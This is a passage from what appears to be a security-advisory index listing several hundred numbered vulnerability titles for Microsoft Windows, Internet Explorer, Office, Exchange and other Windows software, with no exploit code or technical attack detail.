Lets Remote and Local Users Execute Arbitrary Code [1018226] Windows Schannel Digital Signature Bug Lets Remote Users Execute Arbitrary Code [1018225] Windows Vista Discloses Sensitive Information to Local Users [1018202] Microsoft GDI+ ICO File Divide By Zero Bug Lets Remote Users Deny Service [1018193] Microsoft Internet Explorer Lets Remote Users Spoof Certain Objects [1018192] Microsoft Internet Explorer Input Validation Hole Permits Cross-Site Scripting Attacks [1018188] Symantec VERITAS Storage Foundation Windows Scheduler Service Lets Remote Users Execute Arbitrary Commands [1018107] Microsoft Office Buffer Overflow in OUACTRL.OCX ActiveX Control Lets Remote Users Execute Arbitrary Code [1018019] Microsoft Internet Explorer Bugs Let Remote Users Modify Files or Execute Arbitrary Code [1018017] Microsoft CAPICOM 'CAPICOM.Certificates' ActiveX Control Lets Remote Users Execute Arbitrary Code [1018016] Microsoft BizTalk Server 'CAPICOM.Certificates' ActiveX Control Lets Remote Users Execute Arbitrary Code [1018015] Microsoft Exchange Base64, iCal, IMAP, and Attachment Processing Bugs Let Remote Users Deny Service or Execute Arbitrary Code [1018014] Microsoft Office Drawing Object Validation Flaw Lets Remote Users Execute Arbitrary Code [1018013] Microsoft Word Array and RTF Processing Bugs Let Remote Users Execute Arbitrary Code [1018012] Microsoft Excel Specially Crafted BIFF Records, Set Font Values, and Filter Records Permit Remote Code Execution [1017969] Microsoft Internet Explorer Digest Authentication Bug Lets Remote Users Conduct HTTP Request Splitting Attacks [1017902] Microsoft Word Lets Remote Users Cause Arbitrary Code to Be Executed [1017898] Windows Kernel Memory Mapping Permission Error Lets Local Users Gain System Privileges [1017897] Windows Vista Client-Server Run-time Subsystem Lets Local Users Gain Elevated Privileges [1017896] Microsoft Agent URL Parsing Bug Lets Remote Users Execute Arbitrary Code [1017895] Windows XP Universal Plug and Play Lets Remote Users on the Local Subnet Execute Arbitrary Code [1017894] Microsoft Content Management Server Permits Cross-Site Scripting Attacks and Lets Remote Users Execute Arbitrary Code [1017847] Windows Kernel GDI Color Parameter Bug Lets Local Users Gain System Privileges [1017846] Windows Kernel GDI Input Validation Flaw in Processing Application Size Parameters Lets Local Users Gain System Privileges [1017845] Windows TrueType Font Rasterizer Lets Local Users Gain System Privileges [1017844] Windows Kernel EMF Image Processing Bug Lets Local Users Gain System Privileges [1017843] Windows Kernel WMF Image Processing Lets Remote Users Deny Service [1017816] Windows Mail URL Bug Lets Remote Users Cause Execute Existing Code on the Target User's System to Be Executed [1017712] Citrix Presentation Server Client for Windows Lets Remote Users Execute Arbitrary Code [1017694] VeriSign Secure Messaging for Microsoft Exchange Stack Overflow in ConfigChk ActiveX Control Lets Remote Users Execute Arbitrary Code [1017653] Microsoft Word Unspecified Vulnerability Lets Remote Users Execute Arbitrary Code [1017643] Microsoft Internet Explorer Multiple COM Objects Let Remote Users Execute Arbitrary Code [1017642] Microsoft Internet Explorer FTP Server Response Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1017640] Microsoft Office OLE Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1017639] Microsoft Word Macro Security Warning Bug and Drawing Object Memory Corrupution Error Lets Remote Users Execute Arbitrary Code [1017638] Microsoft MFC Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1017637] Microsoft OLE Dialog RTF File Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1017635] Microsoft HTML Help ActiveX Control Lets Remote Users Execute Arbitrary Code [1017634] Windows Image Acquisition Service Buffer Overflow Lets Local Users Gain System Privileges [1017633] Windows Shell Hardware Detection Service Parameter Validation Error Lets Local Users Gain Elevated Privileges [1017632] Microsoft Step-by-Step Interactive Training Buffer Overflow in Processing Bookmark Links Lets Remote Users Execute Arbitrary Code [1017609] HP OpenView Network Node Manager Unsafe Folder Permissions Lets Local Windows Users Gain Elevated Privileges [1017584] Microsoft Office Excel Buffer Overflow Lets Remote Users Execute Arbitrary Code [1017579] [Duplicate Entry] Microsoft Word Unspecified Vulnerability Lets Remote Users Execute Arbitrary Code [1017564] Microsoft Word Function Processing Bug Lets Remote Users Execute Arbitrary Code [1017530] Microsoft Help Workshop Buffer Overflow in Processing '.CNT' Files Lets Remote Users Execute Arbitrary Code [1017489] Windows Vector Markup Language Buffer Overflow Lets Remote Users Execute Arbitrary Code [1017488] Microsoft Outlook '.iCal', '.oss', and SMTP Header Bugs Let Remote Users Execute Arbitrary Code or Deny Service [1017487] Microsoft Excel Buffer Overflows in Processing Various Records and Strings Lets Remote Users Execute Arbitrary Code [1017486] Microsoft Office Brazilian Portuguese Grammar Checker Lets Remote Users Execute Arbitrary Code [1017485] Microsoft Excel Memory Access Error Lets Remote Users Execute Arbitrary Code [1017454] Windows Client-Server Run-time Subsystem NtRaiseHardError Discloses Memory to Local Users [1017433] Windows Client-Server Run-time Subsystem Lets Remote Users Execute Arbitrary Code [1017401] Mozilla Firefox Windows Cursor Image Conversion Heap Overflow Lets Remote Users Execute Arbitrary Code [1017400] Mozilla Thunderbird Windows Cursor Image Conversion Heap Overflow Lets Remote Users Execute Arbitrary Code [1017399] Mozilla Seamonkey Windows Cursor Image Conversion Heap Overflow Lets Remote Users Execute Arbitrary Code [1017397] Microsoft Outlook Recipient ActiveX Control Lets Remote Users Deny Service [1017390] Microsoft Word Unchecked Count Vulnerability Lets Remote Users Execute Arbitrary Code [1017388] Microsoft Project Discloses Database Password to Remote Authenticated Users [1017374] Microsoft Internet Explorer May Disclose Contents of the Temporary Internet Files Folder to Remote Users [1017373] Microsoft Internet Explorer DHTML and Script Error Handling Bugs Let Remote Users Execute Arbitrary Code [1017372] Windows Media Player and Windows Media Format Runtime ASF File Buffer Overflow Lets Remote Users Execute Arbitrary Code [1017371] Windows SNMP Service Buffer Overflow Lets Remote Users Execute Arbitrary Code [1017370] Windows Client-Server Run-time Subsystem Lets Local Users Gain System Privileges [1017368] Windows Remote Installation Service TFTP Server Lets Remote Users Overwrite Files to Execute Arbitrary Code [1017358] Microsoft Word Data Structure Processing Bug Lets Remote Users Cause Arbitrary Code to Be Executed [1017354] Windows Media Player ASX Playlist File Buffer Overflow May Let Remote Users Execute Arbitrary Code [1017339] Microsoft Word String Processing Bug Lets Remote Users Execute Arbitrary Code [1017330] Windows Print Spooler Subsystem GetPrinterData() Function Lets Remote Users Deny Service [1017224] Microsoft Client Service for Netware Buffer Overflows Let Remote Users Execute Arbitrary Code and Crash the System [1017223] Microsoft Internet Explorer Bug in Rending HTML Layout Combinations May Let Remote Users Execute Arbitrary Code [1017222] Microsoft Agent '.ACF' File Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1017221] Windows Workstation Service Buffer Overflow Lets Remote Users Execute Arbitrary Code [1017165] Microsoft Internet Explorer 'ieframe.dll' Lets Remote Users Spoof Invalid Certificates [1017157] Microsoft XML Core Services ActiveX Control Lets Remote Users Execute Arbitrary Code [1017142] Microsoft Visual Studio WMI Object Broker ActiveX Control Lets Remote Users Execute Arbitrary Code [1017133] Microsoft NAT Helper 'ipnathlp.dll' Lets Remote Users Deny Service [1017127] Microsoft Data Access Components 'ADODB.Connection' Execute Function Lets Remote Users Execute Arbitrary Code [1017122] Microsoft Internet Explorer Lets Remote Users Partially Spoof Address Bar URLs [1017059] Microsoft PowerPoint Bug Causes PowerPoint to Crash [1017037] Windows Object Packager RTF File Object Lets Remote Users Execute Arbitrary Code [1017035] Windows Server Service SMB Rename Null Pointer Dereference Lets Remote Users Deny Service [1017034] Microsoft Office String, Chart Record, and SmartTag Validation Errors Let Remote Users Execute Arbitrary Code [1017033] Microsoft XML Core Services Lets Remote Users Execute Arbitrary Code or Obtain Information [1017032] Microsoft Word String and Mail Merge Record Validation Flaws Let Remote Users Execute Arbitrary Code [1017031] Microsoft Excel DATETIME/COLINFO Record Errors and Lotus 1-2-3 Errors Let Remote Users Execute Arbitrary Code [1017030] Microsoft PowerPoint Errors in Parsing Object Pointers and Data Records Lets Remote Users Execute Arbitrary Code [1017018] Cisco Secure Desktop May Let Local Users Access Data Via Windows Operating System Files [1016937] Microsoft PowerPoint Memory Corruption Bug Lets Remote Users Execute Arbitrary Code [1016886] [Duplicate] Microsoft PowerPoint Bug Lets Remote Users Execute Arbitrary Code [1016879] Microsoft Internet Explorer VML Buffer Overflow Lets Remote Users Execute Arbitrary Code [1016854] Microsoft Internet Explorer Buffer Overflow in 'daxctle.ocx' ActiveX in KeyFrame Method Control Lets Remote Users Execute Arbitrary Code [1016839] Microsoft Internet Explorer URLMON.DLL Buffer Overflow Lets Remote Users Execute Arbitrary Code [1016827] Microsoft PGM Implementation Buffer Overflow in MSMQ Service Lets Remote Users Execute Arbitrary Code [1016826] Windows Indexing Service Input Validation Flaw in Query Parameters Permits Cross-Site Scripting Attacks [1016825] Microsoft Publisher Buffer Overflow in Parsing '.pub' Files Lets Remote Users Execute Arbitrary Code [1016787] Microsoft Word Record Validation Vulnerability Lets Remote Users Execute Arbitrary Code [1016764] Microsoft Internet Explorer (IE) Buffer Overflow in 'daxctle.ocx' ActiveX Control Lets Remote Users Execute Arbitrary Code [1016731] Microsoft Internet Explorer URL Buffer Overflow in Processing HTTP 1.1 Protocol with Compression Lets Remote Users Execute Arbitrary Code [1016720] [Duplicate Entry] Microsoft PowerPoint Unknown Bug May Let Remote Users Execute Arbitrary Code [1016667] Windows Server Service Buffer Overflow Lets Remote Users Execute Arbitrary Code [1016663] Microsoft Internet Explorer Bugs Let Remote Users Obtain Information or Execute Arbitrary Code [1016662] Windows 2000 Kernel Winlogon Alternate Path Lets Local Users Gain Elevated Privileges. [1016661] Windows Kernel Incorrect Exception Handling Lets Remote Users Execute Arbitrary Code [1016659] Windows Hyperlink Object Library Buffer Overflow Lets Remote Users Execute Arbitrary Code [1016658] Windows 2000 Kernel Buffer Overflow Lets Local Users Gain Elevated Privileges [1016657] Microsoft Office Buffer Overflow in Processing PowerPoint Records Lets Remote Users Execute Arbitrary Code [1016656] Microsoft Visual Basic for Applications Buffer Overflow Lets Remote Users Execute Arbitrary Code [1016655] Microsoft Management Console Input Validation Hole Permits Remote Code Execution [1016654] Microsoft Outlook Express MHTML Parsing Error Lets Remote Users Execute Arbitrary Code [1016653] Windows Winsock and DNS Client Buffer Overflows Let Remote Users Execute Arbitrary Code [1016606] Windows Server Service Null Pointer Comparison Lets Remote Users Deny Service [1016506] Microsoft Internet Security and Acceleration Server HTTP File Exentsion Filter Can Be Bypassed By Remote Users [1016504] Microsoft Works Buffer Overflow in Processing Spreadsheet Files May Let Remote Users Execute Arbitrary Code [1016496] Microsoft PowerPoint 'mso.dll' Buffer Overflow May Let Remote Users Execute Arbitrary Code [1016472] Microsoft Excel Errors in Processing Various Malformed Records Let Remote Users Execute Arbitrary Code [1016470] Microsoft Office PNG and GIF File Buffer Error Lets Remote Users Execute Arbitrary Code [1016469] Microsoft Office String Parsing and Property Bugs Let Remote Users Execute Arbitrary Code [1016468] Microsoft DHCP Client Buffer Overflow Lets Remote Users Execute Arbitrary Code [1016467] Windows Server Service Buffer Overflows Let Remote Users View SMB Information and Execute Arbitrary Code [1016466] Microsoft Internet Information Server (IIS) Buffer Overflow in Processing ASP Pages Lets Remote Authenticated Users Execute Arbitrary Code [1016453] Microsoft Office LsCreateLine() Function May Let Remote Users Execute Arbitrary Code [1016434] Microsoft HTML Help Heap Overflow in HHCtrl ActiveX Control May Let Remote Users Execute Arbitrary Code [1016430] Microsoft Excel STYLE Record Bug May Let Remote Users Execute Arbitrary Code [1016375] Webmin for Windows Error in Parsing '\' Backslash Character Permits Directory Traversal Attacks [1016373] Windows Live Messenger Contact List Heap Overflow [1016344] Microsoft Excel 'Shockwave Flash Object' Lets Remote Users Execute Code Automatically [1016316] Microsoft Excel Memory Validation Flaw May Let Remote Users Cause Arbitrary Code to Be Executed [1016291] Microsoft Internet Explorer Multiple Memory and Access Control Errors Let Remote Users Execute Arbitrary Code [1016289] Microsoft RPC Mutual Authentication Bug Lets Remote Users Spoof Other Systems [1016288] Windows Server Message Block Processing Bugs Let Local Users Gain Elevated Privileges or Deny Service [1016287] Microsoft PowerPoint Buffer Overflow in Processing Malformed Records Lets Remote Users Execute Arbitrary Code [1016285] Windows Routing and Remote Access Service RPC Buffer Overflows Let Remote Users Execute Arbitrary Code [1016284] Windows Media Player Buffer Overflow in Rendering PNG Images Lets Remote Users Execute Arbitrary Code [1016283] Microsoft JScript Memory Corruption Bug Lets Remote Users Execute Arbitrary Code [1016280] Microsoft Outlook Web Access Input Validation Hole Permits Cross-Site Scripting Attacks [1016196] F-Secure Anti-Virus for Microsoft Exchange Buffer Overflow in Web Console May Let Remote Users Execute Arbitrary Code [1016156] Cisco VPN Client for Windows Lets Local Users Gain Elevated Privileges [1016130] Microsoft Word Lets Remote Users Cause Arbitrary Code to Be Executed [1016048] Microsoft Exchange Error in Processing iCAL/vCAL Properties Lets Remote Users Execute Arbitrary Code [1016047] Microsoft Distributed Transaction Coordinator Bugs Let Remote Users Deny Service [1016005] Microsoft Outlook Express 'mhtml:' Redirect URL Processing Lets Remote Users Bypass Security Domains [1016001] Microsoft Internet Explorer Bug in Processing Nested OBJECT Tags Lets Remote Users Execute Arbitrary Code [1015969] HP StorageWorks Secure Path for Windows Lets Remote Users Deny Service [1015950] Neon Responders for Windows Can Be Crashed By Remote Users [1015900] Microsoft Internet Explorer Parsing and State Errors Let Remote Users Execute Arbitrary Code [1015899] Microsoft Internet Explorer Lets Remote Users Spoof the Address Bar URL [1015896] Microsoft FrontPage Server Extensions Input Validation Holes Permit Cross-Site Scripting Attacks [1015895] Microsoft SharePoint Team Services Input Validation Holes Permit Cross-Site Scripting Attacks [1015894] Microsoft Data Access Components RDS.Dataspace Access Control Bug Lets Remote Users Execute Arbitrary Code [1015892] Microsoft Internet Explorer Popup Window Object Bugs Let Remote Users Execute Scripting Code in Arbitrary Domains [1015855] Microsoft Office Array Index Boundary Error Lets Remote Users Execute Arbitrary Code [1015825] Microsoft ASP.NET Incorrect COM Component Reference Lets Remote Users Deny Service [1015812] Microsoft Internet Explorer createTextRange() Memory Error Lets Remote Users Execute Arbitrary Code [1015800] (Vendor Issues Fix) Microsoft Internet Explorer (IE) Lets Remote Users Cause HTA Files to Be Executed [1015794] (Vendor Issues Fix) Microsoft Internet Explorer 'mshtml.dll' Bug in Processing Multiple Action Handlers Lets Remote Users Deny Service [1015785] Veritas Backup Exec for Windows Servers Media Server Format String Bug in BENGINE May Let Remote Users Execute Arbitrary Code [1015766] Microsoft Office and Excel Buffer Overflows Let Remote Users Execute Arbitrary Code [1015720] Microsoft Internet Explorer Modal Security Dialog Race Condition May Let Remote Users Install Code or Obtain Information [1015632] Microsoft PowerPoint May Let Users Access Contents of the Temporary Internet Files Folder [1015631] Microsoft Office Korean Input Method Editor Lets Local Users Gain Elevated Privileges [1015628] Windows Media Player Plug-in for 3rd Party Browsers Buffer Overflow in Processing EMBED Elements Lets Remote Users Execute Arbitrary Code [1015627] Windows Media Player Bitmap File Bug May Let Remote Users Execute Arbitrary Code [1015585] Microsoft HTML Help Workshop Buffer Overflow in Processing .hhp Files Lets Remote User Execute Arbitrary Code [1015559] Microsoft Internet Explorer Shockwave Flash Scripting Bug Lets Remote Users Deny Service [1015489] Microsoft Wireless Network Connection Software May Broadcast Ad-Hoc SSID Information in Certain Cases [1015461] Microsoft Outlook Buffer Overflow in Processing TNEF Messages Lets Remote Users Execute Arbitrary Code [1015460] Microsoft Exchange Buffer Overflow in Processing TNEF Messages Lets Remote Users Execute Arbitrary Code [1015376] Microsoft IIS Lets Remote Users Deny Service or Execute Arbitrary Code With Malformed HTTP GET Requests [1015350] Microsoft Internet Explorer Bug in Using HTTPS Proxies May Disclose Web URLs to Remote Users [1015348] Microsoft Internet Explorer Bug in Instantiating COM Objects May Let Remote Users Execute Arbitrary Code [1015333] Microsoft Excel Unspecified Stack Overflow May Let Remote Users Cause Arbitrary Code to Be Executed [1015251] Microsoft Internet Explorer Bug in Processing Mismatched Document Object Model Objects May Let Remote Users Execute Arbitrary Code [1015226] Microsoft AntiSpyware Improper CreateProcess() Call Lets Local Users Execute Arbitrary Code [1015224] Kaspersky Anti-Virus for Windows File Servers Improper CreateProcess() Call Lets Local Users Execute Arbitrary Code [1015222] Apple iTunes for Windows Improper CreateProcess() Call Lets Local Users Execute Arbitrary Code [1015143] F-Secure Anti-Virus for Microsoft Exchange Web Console May Disclose Files to Remote Users [1015101] Microsoft Internet Explorer J2SE Runtime Environment Bug Lets Remote Users Crash the Target User's Browser [1015043] Microsoft Network Connection Manager Lets Remote Users Deny Service [1015041] Microsoft Client Service for NetWare Buffer Overflow Lets Remote Users Execute Arbitrary Code [1015038] Microsoft Exchange Buffer Overflow in Collaboration Data Objects Lets Remote Users Execute Arbitrary Code [1015034] Microsoft DirectX DirectShow Buffer Overflow Lets Remote Users Execute Arbitrary Code [1014899] AVIRA Desktop for Windows Buffer Overflow in Processing ACE Archives May Let Remote Users Execute Arbitrary Code [1014871] NOD32 for Windows Buffer Overflow in Processing ARJ Archives May Let Remote Users Execute Arbitrary Code [1014809] Microsoft Internet Explorer Unspecified Bug May Permit Remote Code Execution [1014777] Microsoft IIS ASP Error Page May Disclose System Information in Certain Cases [1014727] Microsoft 'msdds.dll' COM Object Lets Remote Users Execute Arbitrary Code [1014643] Microsoft Internet Explorer COM Object Instantiation Bug May Let Remote Users Execute Arbitrary Code [1014641] Microsoft Internet Explorer Web Folder URL Validation Bug Lets Remote Users Execute Scripting Code in an Arbitrary Security Domain [1014566] Windows Buffer Overflow in Unspecified USB Device Driver Lets Physically Local Users Execute Arbitrary Code [1014500] Microsoft Internet Explorer (IE) JPEG Rendering Bugs Let Remote Users Deny Service or Execute Arbitrary Code [1014458] Microsoft Office Buffer Overflow in Parsing Fonts Lets Remote Users Cause Arbitrary Code to Be Executed [1014457] Microsoft Microsoft Color Management Module Lets Remote Users Execute Arbitrary Code [1014364] Microsoft Internet Information Server May Allow Remote Users to Conduct HTTP Response Smuggling Attacks [1014356] Microsoft ISA Server May Accept HTTP Authentication Even When SSL Is Required [1014352] Microsoft Front Page May Crash When Editing a Specially Crafted Web Page [1014329] Microsoft Internet Explorer 'javaprxy.dll' COM Object Exception Handling Lets Remote Users Execute Arbitrary Code [1014261] Microsoft Internet Explorer Lets Remote Users Spoof Javascript Dialog Boxes [1014201] Microsoft Internet Explorer Buffer Overflow in Rendering PNG Images Lets Remote Users Execute Arbitrary Code [1014200] Microsoft Outlook Express Buffer Overflow in NNTP Response Parser Lets Remote Users Execute Arbitrary Code [1014199] Microsoft Outlook Web Access Input Validation Hole in IMG Tags Permits Cross-Site Scripting Attacks [1014197] Microsoft Agent Lets Remote Users Spoof Security Dialog Box Contents [1014195] Microsoft HTML Help Input Validation Flaw Lets Remote Users Execute Arbitrary Code [1014194] Microsoft Step-by-Step Interactive Training Bookmark Link File Validation Flaw Lets Remote Users Execute Arbitrary Code [1014193] Microsoft Internet Security and Acceleration Server Bugs Let Remote Users Poison the Cache and Establish NetBIOS Connections [1014178] Symantec pcAnywhere 'Launch With Windows' Properties Let Local Users Gain Elevated Privileges [1014174] Microsoft Internet Explorer Lets Remote Users Obfuscate Scripting Code [1014131] SMTP Server for Windows NT/2000/XP/2003 Lets Remote Users Crash the SMTP Service [1014113] Microsoft ISA Server in SecureNAT Configuration Can Be Crashed By Remote Users [1014050] Computer Associates eTrust Antivirus Integer Overflow in Processing Microsoft OLE Data Lets Remote Users Execute Arbitrary Code [1013996] Microsoft ASP.NET May Disclose System Information to Remote Users in Certain Cases [1013945] Windows Media Player License Acquisition Feature May Let Remote Users Redirect Users to Arbitrary Web Pages [1013692] Microsoft Internet Explorer Buffer Overflows in DHTML, URL Parsing, and Content Advisor Let Remote Users Execute Arbitrary Code [1013691] Microsoft Message Queuing Buffer Overflow Lets Remote Users Execute Arbitrary Code [1013687] Microsoft Exchange Heap Overlow in Processing Extended SMTP Verb Lets Remote Users Execute Arbitrary Code [1013684] Microsoft Word Unspecified Buffer Overflow in Processing Documents Lets Remote Users Execute Arbitrary Code [1013669] Microsoft Outlook Web Access 'From' Address Display Lets Remote Users Spoof Origination Addresses [1013668] Microsoft Outlook 'From' Address Display Lets Remote Users Spoof Origination Addresses [1013618] Microsoft Jet Database Buffer Overflow in 'msjet40.dll' Lets Remote Users Execute Arbitrary Code [1013583] Microsoft Outlook Connector for IBM Lotus Domino Lets Users Bypass Password Storage Policy [1013454] Microsoft Office InfoPath 2003 May Disclose System and Authentication Information to Remote Users [1013436] GoodTech Telnet Server for Windows NT/2000/XP/2003 Buffer Overflow in Administration Port Lets Remote Users Execute Arbitrary Code [1013205] Microsoft Internet Explorer Can Be Crashed With URL Containing Special URL Characters [1013126] Microsoft Internet Explorer CDF Scripting Error Lets Remote Users Execute Scripting Code in Arbitrary Domains [1013125] Microsoft Internet Explorer DHTML Method Heap Overflow Lets Remote Users Execute Arbitrary Code [1013124] Microsoft Internet Explorer URL Encoding Error Lets Remote Users Spoof Arbitrary URLs and Execute Scripting Code in Arbitrary Security Zone [1013111] Microsoft SharePoint Services Redirection Query Input Validation Hole Lets Remote Users Conduct Cross-Site Scripting Attacks [1013110] Microsoft Office XP Buffer Overflow in Processing URLs Lets Remote Users Execute Arbitrary Code [1013108] Mozilla Firefox Hybrid Image Bug Allows Batch Statements to Be Draged to the Desktop and Tabbed Javascript Bugs Let Remote Users Access Other Windows [1013086] Microsoft Outlook Web Access 'owalogon.asp' Lets Remote Users Redirect Login Requests [1012836] Microsoft HTML Help Active Control Cross-Domain Error Lets Remote Users Execute Arbitrary Commands [1012835] Microsoft Cursor and Icon Validation Error Lets Remote Users Execute Arbitrary Code [1012833] Windows Indexing Service Buffer Overflow in Processing Queries Lets Remote Users Execute Arbitrary Code [1012706] netcat for Windows Buffer Overflow in doexec Lets Remote Users Execute Arbitrary Code [1012652] Spy Sweeper Enterprise Windows Tray Icon Lets Local Users Gain Elevated Privileges [1012584] Microsoft IE dhtmled.ocx Lets Remote Users Execute Cross-Domain Scripting Attacks [1012518] Microsoft HyperTerminal Buffer Overflow Lets Remote Users Execute Arbitrary Code [1012517] Microsoft WINS Buffer Overflow in Name Value Lets Remote Users Execute Arbitrary Code [1012514] Microsoft WordPad Error in Converting Tables/Fonts Lets Remote Users Execute Arbitrary Code [1012512] Microsoft LSASS Bug in Validating Identity Tokens Lets Local Users Gain Elevated Privileges [1012461] KDE Konqueror Lets Remote Users Inject Content into Open Windows [1012460] Opera Lets Remote Users Inject Content into Open Windows [1012459] Apple Safari Lets Remote Users Inject Content into Open Windows [1012457] Mozilla Firefox Lets Remote Users Inject Content into Open Windows [1012444] Microsoft Internet Explorer Input Validation Error in Processing FTP URLs May Let Remote Users Inject Arbitrary FTP Commands [1012341] Microsoft WINS Memory Overwrite Lets Remote Users Execute Arbitary Code [1012288] Microsoft IE Custom 404 Error Message and execCommand SaveAs Lets Remote Users Bypass XP SP2 Download Warning Mechanisms [1012272] Mailtraq Windows Tray Icon Lets Local Users Gain System Privileges [1012271] Altiris AClient Service Windows Tray Icon Lets Local Users Gain System Privileges [1012234] Microsoft Internet Explorer on XP SP2 Has Unspecified Flaws That Let Remote Users Bypass File Download Restrictions [1012155] Microsoft Internet Security and Acceleration Server Reverse DNS Caching Bug Lets Remote Users Spoof Web Sites [1012154] Microsoft Proxy Server Reverse DNS Caching Bug Lets Remote Users Spoof Web Sites [1012138] Microsoft IE Discloses Whether Specified Files Exist to Remote Users [1012057] F-Secure Anti-Virus for Microsoft Exchange Lets Remote Users Bypass Anti-Virus Detection With a ZIP Archive [1012049] (Exploit Code Has Been Released) Microsoft Internet Explorer Buffer Overflow in IFRAME/EMBED Tag Processing Lets Remote Users Execute Arbitrary Code [1011987] Microsoft Internet Explorer Lets Remote Users Spoof the Status Bar Address with a Table Within a Link [1011895] Microsoft IE for Mac Multi-Window Browsing Errors Let Remote Users Spoof Sites [1011890] Microsoft Outlook May Display Images in Plaintext Only Mode [1011851] Microsoft IE AnchorClick Behavior and HTML Help Let Remote Users Execute Arbitrary Code [1011735] Microsoft Internet Explorer May Display the Incorrect URL When Loading a Javascript Homepage [1011706] Microsoft Operating System 'asycpict.dll' Lets Remote Users Crash the System [1011678] Microsoft IE MSN 'heartbeat.ocx' Component Has Unspecified Flaw [1011646] Microsoft Program Group Converter Buffer Overflow Lets Remote Users Execute Arbitrary Code [1011645] Microsoft Various Operating System Flaws Lets Remote Users Execute Code and Local Users Gain Elevated Privileges or Deny Service [1011644] Microsoft IE Plug-in Navigation Flaw Lets Remote Users Spoof URLs in the Addresses Bar [1011643] Microsoft IE Double Byte Parsing Flaw Lets Remote Users Spoof URLs in the Addresses Bar [1011642] Microsoft IE SSL Caching Flaw Lets Remote Users Run Scripting Code in the Context of Arbitrary Secure Sites [1011640] Microsoft IE Buffer Overflow in Install Engine Lets Remote Users Execute Arbitrary Code [1011639] Microsoft IE Buffer Overflow in Processing Cascading Style Sheets Lets Remote Users Execute Arbitrary Code [1011636] Microsoft SMTP Service Buffer Overflow in Processing DNS Responses May Let Remote Users Execute Arbitrary Code [1011635] Microsoft Excel Unspecified Flaw Lets Remote Users Execute Arbitrary Code [1011634] Microsoft NetDDE Buffer Overflow Lets Remote Users Execute Arbitrary Code With System Privileges [1011633] Microsoft IIS WebDAV XML Message Handler Error Lets Remote Users Deny Service [1011632] Microsoft NT RPC Runtime Library Buffer Overflow Lets Remote Users Deny Service [1011631] Microsoft NNTP Buffer Overflow Lets Remote Users Execute Arbitrary Code With SYSTEM Privileges [1011627] Windows 2003 Default ACL Permissions on the Firewall Service Lets Any Users Stop the Service [1011626] Microsoft Cabarc Directory Traversal Flaw Lets Remote Users Create/Overwrite Files on the Target System [1011565] Microsoft Word Parsing Flaw May Let Remote Users Execute Arbitrary Code [1011563] Microsoft Internet Explorer Lets Remote Users Access XML Documents [1011559] Microsoft .NET Forms Authentication Can Be Bypassed By Remote Users [1011434] Microsoft SQL Server Can Be Crashed By Remote Users Sending a Specially Crafted Large Buffer [1011374] Windows XP Service Pack 2 Firewall Configuration Error Exposes File and Print Sharing to Remote Users [1011344] IBM OEM Version of Windows XP Silently Creates Administrator Account With No Password [1011332] Microsoft Internet Explorer Bug in Setting Cookies in Certain Domains May Let Remote Users Conduct Session Fixation Attacks [1011253] Microsoft GDI+ Buffer Overflow in Processing JPEG Images Lets Remote Users Execute Arbitrary Code [1011252] Microsoft Works Suite Buffer Overflow in WordPerfect Converter Lets Remote Users Execute Arbitrary Code [1011251] Microsoft Publisher Buffer Overflow in WordPerfect Converter Lets Remote Users Execute Arbitrary Code [1011250] Microsoft FrontPage Buffer Overflow in WordPerfect Converter Lets Remote Users Execute Arbitrary Code [1011249] Microsoft Office Buffer Overflow in WordPerfect Converter Lets Remote Users Execute Arbitrary Code [1011200] F-Secure Anti-Virus for Microsoft Exchange Input Validation Bug in Content Scanner Server Lets Remote Users Deny Service [1011141] HP Systems Insight Manager May Not Let Users Login After Applying a Microsoft Security Patch [1011067] Microsoft Outlook Express May Disclose 'bcc:' Recipient Addresses [1011043] Microsoft Internet Explorer Local File IFRAME Error Response Lets Remote Users Determine if Files or Directories Exist [1010995] Windows XP SP2 May Display the Wrong Icon in Zip Archives [1010992] Microsoft Internet Security and Acceleration Server Does Not Block FTP Bounce Attacks [1010957] Microsoft Internet Explorer Unregistered Protocol State Error Lets Remote Users Spoof Location Bar [1010916] Microsoft Outlook Web Access Input Validation Hole in Redirection Query Permits Cross-Site Scripting Attacks [1010836] Windows Remote Desktop May Let Remote Users Crash the System [1010827] Microsoft Internet Explorer Error in 'mshtml.dll' in Processing GIF Files Lets Remote Users Crash the Browser [1010713] Microsoft Systems Management Server (SMS) Client Can Be Crashed By Remote Users [1010694] Microsoft IE Lets Remote Users Spoof Filenames Using CLSIDs [1010693] Microsoft Internet Explorer 'shell:' Protocol Lets Remote Users Execute Arbitrary Scripting Code in the Local Zone [1010692] Microsoft IIS 4.0 Buffer Overflow in Redirect Function Lets Remote Users Execute Arbitrary Code [1010690] Microsoft HTML Help Input Validation Error Lets Remote Users Execute Arbitrary Code [1010686] Microsoft Utility Manager Permits Local Applications to Run With Elevated Privileges [1010683] Microsoft Internet Explorer Same Name Javascript Bug Lets Remote Users Execute Arbitrary Javascript in the Domain of an Arbitrary Site [1010679] Microsoft Internet Explorer Access Control Flaw in popup.show() Lets Remote Users Execute Mouse-Click Actions [1010673] Microsoft Internet Explorer Can Be Crashed By Remote Users With Large Text Files [1010669] Mozilla Lets Remote Users Launch Local Windows Applications Via the 'shell:' Protocol [1010668] Firefox Lets Remote Users Launch Local Windows Applications Via the 'shell:' Protocol [1010667] Thunderbird Lets Remote Users Launch Local Windows Applications Via the 'shell:' Protocol [1010610] Microsoft IIS Web Server May Disclose Private IP Addresses in Certain Cases [1010550] Microsoft MN-500 Wireless Base Station Lets Remote Users Deny Administrative Access [1010491] Microsoft Internet Explorer Crashes When Saving Files With Special Character Strings [1010482] Microsoft Internet Explorer '%2F' URL Parsing Error Lets Remote Users Spoof Sites in the Trusted Zone [1010479] (US-CERT Issues Advisory) Microsoft Internet Explorer Cross-Domain Redirect Hole Lets Remote Users Execute Arbitrary Code [1010427] Microsoft DirectX DirectPlay Input Validation Error Lets Remote Users Crash the Application [1010189] Microsoft Outlook 2003 Scripting Restrictions Can Be Bypassed By Remote Users [1010175] Microsoft Visual Basic Buffer Overflow May Let Local Users Gain Elevated Privileges [1010166] Microsoft Outlook Express Mail Troubleshooting Function May Disclose SMTP Password to Local Users [1010165] Microsoft Internet Explorer Image Map URL Display Error Lets Remote Users Spoof URLs [1010157] Microsoft Internet Explorer showHelp Path Search Lets Remote Users Load Existing Local CHM Files [1010125] Microsoft Outlook 2003 Lets Remote Users Send E-mail to Cause the Recipient's Client to Contact a Remote Server [1010119] Microsoft Help and Support Center HCP 